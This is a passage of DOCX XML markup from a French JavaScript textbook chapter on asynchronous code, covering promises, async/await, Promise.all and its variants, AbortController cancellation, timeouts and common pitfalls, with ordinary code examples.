        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Promise.any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>La première réussie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une chaîne qui devient difficile à lire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Transformer en chaîne</w:t>
        <w:br/>
        <w:t>fetch("/api/utilisateur")</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(r =&gt; r.json())</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(u =&gt; fetch(`/api/commandes/${u.id}`))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(r =&gt; r.json())</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(commandes =&gt; afficher(commandes))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .catch(erreur =&gt; afficherErreur(erreur));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">29.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transforme une fonction en fonction renvoyant une promesse. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suspend son exécution jusqu'à la résolution, sans bloquer le reste du programme. Le code se lit de haut en bas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La même logique, linéaire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async function chargerCommandes() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const reponse = await fetch("/api/utilisateur");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const utilisateur = await reponse.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const rep = await fetch(`/api/commandes/${utilisateur.id}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return rep.json();</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>chargerCommandes()</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(commandes =&gt; afficher(commandes))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .catch(erreur =&gt; afficherErreur(erreur));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un `try`/`catch` qui ne masque rien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Gestion d'erreurs explicite, comme du code synchrone</w:t>
        <w:br/>
        <w:t>async function chargerCommandes() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const reponse = await fetch("/api/utilisateur");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!reponse.ok) throw new Error(`HTTP ${reponse.status}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const utilisateur = await reponse.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return utilisateur;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (erreur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    console.error("Chargement impossible :", erreur.message);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw erreur;          // ne pas avaler l'erreur silencieusement</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</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`AWAIT` OUBLIÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Oublier </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> renvoie une promesse là où l'on attend une valeur. Le code continue avec un objet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Promise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et échoue plus loin, avec un message qui ne désigne pas la vraie cause. En cas de doute, vérifiez le type retourné dans la console.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne peut s'utiliser que dans une fonction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou au niveau supérieur d'un module (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>type="module"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Il ne bloque pas le navigateur : il suspend uniquement la fonction en cours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>29.4 Paralléliser ce qui peut l'être</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux requêtes indépendantes exécutées l'une après l'autre prennent la somme de leurs durées. Lancées ensemble, elles prennent la plus longue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un gain immédiat et gratuit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Séquentiel : 600 ms si chaque appel prend 300 ms</w:t>
        <w:br/>
        <w:t>const profil = await chargerProfil();</w:t>
        <w:br/>
        <w:t>const notifications = await chargerNotifications();</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Parallèle : environ 300 ms</w:t>
        <w:br/>
        <w:t>const [profil2, notifications2] = await Promise.all([</w:t>
        <w:br/>
        <w:t xml:space="preserve">  chargerProfil(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  chargerNotifications(),</w:t>
        <w:br/>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Tolérer les échecs partiels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Si un échec ne doit pas annuler les autres</w:t>
        <w:br/>
        <w:t>const resultats = await Promise.allSettled([</w:t>
        <w:br/>
        <w:t xml:space="preserve">  chargerProfil(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  chargerNotifications(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  chargerPreferences(),</w:t>
        <w:br/>
        <w:t>]);</w:t>
        <w:br/>
        <w:br/>
        <w:t>for (const r of resultats) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (r.status === "fulfilled") afficher(r.value);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  else console.warn("Échec partiel :", r.reason.message);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.90 — Quatre stratégies de lancement</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40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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Comportement si un échec survient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tout ou rien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Promise.all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rejet immédiat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Tout tenter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Promise.allSettled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Aucun rejet global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2404"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le plus rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2854"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Promise.race</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le premier résultat, quel qu'il soit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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Le premier succès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="285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Promise.any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Rejet seulement si tout échoue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>29.5 Annulation et délais</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une requête peut être annulée avec un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. C'est indispensable quand un utilisateur tape dans un champ de recherche : la réponse de la frappe précédente ne doit pas écraser la plus récente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Annuler une requête devenue inutile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const controleur = new AbortController();</w:t>
        <w:br/>
        <w:br/>
        <w:t>fetch("/api/recherche?q=css", { signal: controleur.signal })</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(r =&gt; r.json())</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(console.log)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .catch(e =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (e.name === "AbortError") return;   // annulation volontaire</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw e;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Plus tard, si l'utilisateur retape</w:t>
        <w:br/>
        <w:t>controleur.abort();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un délai maximal, sans dépendance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function avecDelai(promesse, ms) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return Promise.race([</w:t>
        <w:br/>
        <w:t xml:space="preserve">    promesse,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new Promise((_, rejeter) =&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      setTimeout(() =&gt; rejeter(new Error("Délai dépassé")), ms)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attention : mettre un délai ne libère pas la requête réelle. Combinez-le avec un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour réellement arrêter le transfert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>29.6 Éviter les pièges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.91 — Cinq pièges fréquents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0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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Correction</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans une boucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lenteur linéaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Promise.all</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur les appels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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async</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>forEach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Aucune attente réelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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for...of</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>map</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>all</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
